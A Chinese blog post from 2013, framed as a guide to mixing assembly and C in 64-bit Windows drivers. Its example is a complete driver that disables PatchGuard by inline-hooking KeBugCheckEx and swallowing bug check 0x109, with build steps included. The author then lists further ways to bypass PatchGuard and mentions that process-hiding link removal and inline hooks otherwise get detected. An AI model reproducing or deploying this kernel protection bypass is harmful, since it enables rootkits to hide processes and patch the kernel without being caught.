2013年1月25日星期五
64位驱动的asm与c混合编程
64位汇编的驱动环境的搭建就不说了。
汇编文件如下:
.data
EXTERN OrigKeBugCheckExRestorePointer:PROC
EXTERN KeBugCheckExHookPointer:PROC
.code
;
; Points the stack pointer at the supplied argument and returns to the caller.
;
public AdjustStackCallPointer
AdjustStackCallPointer PROC
mov rsp, rcx
xchg r8, rcx
jmp rdx
AdjustStackCallPointer ENDP
;
; Wraps the overwritten preamble of KeBugCheckEx.
;
public OrigKeBugCheckEx
OrigKeBugCheckEx PROC
mov [rsp+8h], rcx
mov [rsp+10h], rdx
mov [rsp+18h], r8
lea rax, [OrigKeBugCheckExRestorePointer]
jmp qword ptr [rax]
OrigKeBugCheckEx ENDP
END
编译命令:
ml64 lib.asm
link /lib lib.obj
上面可能有一些警告(我用ida64打开一看少了一个函数),我忽略了。请高手指点。
c文件如下:
#include <ntddk.h>
#include <ntifs.h>
#include <wdm.h>
DRIVER_UNLOAD Unload;
VOID Unload(__in PDRIVER_OBJECT DriverObject)
{
}
// Both of these routines reference the assembly code described above
extern VOID OrigKeBugCheckEx(IN ULONG BugCheckCode, IN ULONG_PTR BugCheckParameter1, IN ULONG_PTR BugCheckParameter2, IN ULONG_PTR BugCheckParameter3, IN ULONG_PTR
BugCheckParameter4);
extern VOID AdjustStackCallPointer(IN ULONG_PTR NewStackPointer, IN PVOID StartAddress, IN PVOID Argument);
// mov eax, ptr
// jmp eax
static CHAR HookStub[] = "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xe0";
// The offset into the ETHREAD structure that holds the start routine.
static ULONG ThreadStartRoutineOffset = 0;
// The pointer into KeBugCheckEx after what has been overwritten by the hook.
PVOID OrigKeBugCheckExRestorePointer;
VOID KeBugCheckExHook(IN ULONG BugCheckCode, IN ULONG_PTR BugCheckParameter1, IN ULONG_PTR BugCheckParameter2, IN ULONG_PTR BugCheckParameter3, IN ULONG_PTR BugCheckParameter4)
{
PUCHAR LockedAddress;
PCHAR ReturnAddress;
PMDL Mdl = NULL;
// Call the real KeBugCheckEx if this isn't the bug check code we're looking for.
if (BugCheckCode != 0x109)
{
//DebugPrint(("Passing through bug check %.4x to %p.", BugCheckCode, OrigKeBugCheckEx));
OrigKeBugCheckEx(BugCheckCode, BugCheckParameter1, BugCheckParameter2, BugCheckParameter3, BugCheckParameter4);
}
else
{
PCHAR CurrentThread = (PCHAR)PsGetCurrentThread();
PVOID StartRoutine = *(PVOID **)(CurrentThread + ThreadStartRoutineOffset);
PVOID StackPointer = IoGetInitialStack();
//DebugPrint(("Restarting the current worker thread %p at %p (SP=%p, off=%lu).", PsGetCurrentThread(), StartRoutine, StackPointer, ThreadStartRoutineOffset));
DbgPrint("拦截了0x109号蓝屏\n");
DbgPrint("Restarting the current worker thread %p at %p (SP=%p, off=%lu).\n", PsGetCurrentThread(), StartRoutine, StackPointer, ThreadStartRoutineOffset);
// Shift the stack pointer back to its initial value and call the routine.
//We subtract eight to ensure that the stack is aligned properly as thread entry point routines would expect.
AdjustStackCallPointer((ULONG_PTR)StackPointer - 0x8, StartRoutine, NULL);
}
// In either case, we should never get here.
__debugbreak();
}
VOID DisablePatchProtectionSystemThreadRoutine(IN PVOID Nothing)
{
UNICODE_STRING SymbolName;
NTSTATUS Status = STATUS_SUCCESS;
PUCHAR LockedAddress;
PUCHAR CurrentThread = (PUCHAR)PsGetCurrentThread();
PCHAR KeBugCheckExSymbol;
PMDL Mdl = NULL;
RtlInitUnicodeString(&SymbolName, L"KeBugCheckEx");
do
{
// Find the thread's start routine offset.
for (ThreadStartRoutineOffset = 0; ThreadStartRoutineOffset < 0x1000; ThreadStartRoutineOffset += 4)
{
if (*(PVOID **)(CurrentThread + ThreadStartRoutineOffset) == (PVOID)DisablePatchProtectionSystemThreadRoutine) //DisablePatchProtection2SystemThreadRoutine
break;
}
//DebugPrint(("Thread start routine offset is 0x%.4x.", ThreadStartRoutineOffset));
// If we failed to find the start routine offset for some strange reason, then return not supported.
if (ThreadStartRoutineOffset >= 0x1000)
{
Status = STATUS_NOT_SUPPORTED;
break;
}
// Get the address of KeBugCheckEx.
if (!(KeBugCheckExSymbol = MmGetSystemRoutineAddress(&SymbolName)))
{
Status = STATUS_PROCEDURE_NOT_FOUND;
break;
}
// Calculate the restoration pointer.
OrigKeBugCheckExRestorePointer = (PVOID)(KeBugCheckExSymbol + 0xf);
// Create an initialize the MDL.
if (!(Mdl = MmCreateMdl(NULL, (PVOID)KeBugCheckExSymbol, 0xf)))
{
Status = STATUS_INSUFFICIENT_RESOURCES;
break;
}
MmBuildMdlForNonPagedPool(Mdl);
// Probe & Lock.
if (!(LockedAddress = (PUCHAR)MmMapLockedPages(Mdl, KernelMode)))
{
IoFreeMdl(Mdl);
Status = STATUS_ACCESS_VIOLATION;
break;
}
// Set the aboslute address to our hook.
*(PULONG64)(HookStub + 0x2) = (ULONG64)KeBugCheckExHook;
//DebugPrint(("Copying hook stub to %p from %p (Symbol %p).", LockedAddress, HookStub, KeBugCheckExSymbol));
// Copy the relative jmp into the hook routine.
RtlCopyMemory(LockedAddress, HookStub, 0xf);
// Cleanup the MDL.
MmUnmapLockedPages(LockedAddress, Mdl);
IoFreeMdl(Mdl);
} while (0);
KeBugCheckEx(0x109,0,0,0,0);//测试专用。
}
// A pointer to KeBugCheckExHook
PVOID KeBugCheckExHookPointer = KeBugCheckExHook;
NTSTATUS DisablePatchProtection()
{
OBJECT_ATTRIBUTES Attributes;
NTSTATUS Status;
HANDLE ThreadHandle = NULL;
InitializeObjectAttributes(&Attributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
// Create the system worker thread so that we can automatically find the offset inside the ETHREAD structure to the thread's start routine.
Status = PsCreateSystemThread(&ThreadHandle, THREAD_ALL_ACCESS, &Attributes, NULL, NULL, DisablePatchProtectionSystemThreadRoutine, NULL);
if (ThreadHandle)
ZwClose(ThreadHandle);
return Status;
}
DRIVER_INITIALIZE DriverEntry;
NTSTATUS DriverEntry( __in struct _DRIVER_OBJECT * DriverObject, __in PUNICODE_STRING RegistryPath)
{
NTSTATUS status = STATUS_UNSUCCESSFUL;
//KdBreakPoint();//#define KdBreakPoint() DbgBreakPoint()
DriverObject->DriverUnload = Unload;
DisablePatchProtection();
return 0;
}
关键是在source文件里面加入一行:
TARGETLIBS=lib.lib
那个文件也要复制到相应的位置。与源文件在一个目录里面。
键入bld
enter!
ok!
你看效果吧。
顺便说一下破除PatchGuard的思路:
1.改变或者添加启动模式,如安全,调试,签名等。
2.替换内核文件,那就是吧加载PatchGuard的机制给去掉。
3.从定时器队列中摘除,我没有试验成功,代码没有编译过。
4.就是本文的用到的KeBugCheckEx Hook。
5.异常处理,参考:http://uninformed.org/index.cgi?v=3&a=3&p=16
6.一些hook库。
7.其他,等你告诉我。
注释:隐藏进程的摘链,inline hook都会被PatchGuard发现。
/////////////////////////////////////////////////////////////////////
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
其实还有更简单的:
第一个办法:
在source文件中直接加入:
AMD64_SOURCES = amd64\asm.asm #这是64位的,32位的可以改为I386_SOURCES
但是SOURCES里面就不要再加入asm.asm了。
第二个办法:
工程目录下新建一个名为amd64的文件夹,里面放置汇编文件,
然后再source里面直接添加汇编文件即可。
注意:
如果出现下面的情况:
1>d:\winddk\work\c\amd64\asm.asm(1) : error A2039:line too long
1>d:\winddk\work\c\amd64\asm.asm(1) : error A2088:END directive required at end of file
google一下说是某个版本的ml.exe问题,可能后来改进了。解决办法是:
用系统自带的记事本打开文件,一看源代码只有一行。注释:用别的编辑工具都是好好的。
在记事本里面手工格式化代码就ok!
made by correy
2013.02.18添加。
订阅:
博文评论 (Atom)
没有评论:
发表评论